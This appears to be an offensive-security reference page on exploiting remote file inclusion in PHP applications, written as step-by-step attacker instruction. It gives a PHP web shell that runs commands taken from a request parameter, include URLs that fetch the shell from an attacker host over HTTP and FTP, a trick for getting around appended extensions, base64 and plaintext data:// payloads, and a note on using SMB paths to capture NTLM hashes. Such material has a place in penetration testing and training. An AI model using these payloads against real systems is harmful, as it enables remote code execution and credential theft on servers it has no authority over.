Remote

Remote file inclusion occurs when an include/require sink accepts a full URL, so the interpreter fetches code from a host the attacker controls and runs it in the application's context. It is the most direct inclusion-to-RCE path because no local write or poisoning step is needed.

The condition

In PHP, remote inclusion requires allow_url_include = On (and, for the fetch, allow_url_fopen = On). Both default to Off in modern builds, so RFI is mostly found on legacy or deliberately misconfigured stacks. Where the setting is on, a sink like include($_GET['page']) loads whatever URL you supply.

HTTP include

Host a payload and point the sink at it. The remote file must contain raw PHP; keep the handler from executing it locally by serving it as plain text or using an extension your own server does not run:

?page=http://attacker.example/shell.txt

shell.txt:

<?php system($_GET['c']); ?>

Then drive it:

?page=http://attacker.example/shell.txt&c=id

A ? on the end of the attacker URL swallows any extension the application appends, so include($_GET['page'].'.php') fetches shell.txt? and ignores the .php:

?page=http://attacker.example/shell.txt?

FTP and other schemes

When outbound HTTP is filtered but other fetchers are allowed, the FTP wrapper serves the same role:

?page=ftp://attacker.example/shell.txt

SMB paths (\\attacker\share\shell.php) can work against Windows/PHP targets, and double as an NTLM-hash capture vector when the server authenticates to your listener.

data:// as self-contained RFI

With allow_url_include on, the data:// wrapper carries the code in the request itself, needing no external host:

?page=data://text/plain,<?php system($_GET['c']); ?>
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==

This is handy when the target cannot reach back out to your infrastructure but still honors URL includes.

Beyond PHP

The same shape appears in other ecosystems whenever a template or module loader takes a remote location: server-side template engines that fetch includes over HTTP, JSP/JSF resource loaders, and Node loaders that require a dynamically built path. The pivot is identical, redirect the loader to attacker-controlled code, and the payload language follows the platform.

References

Cookie Consent

We use cookies to enhance your experience. Learn more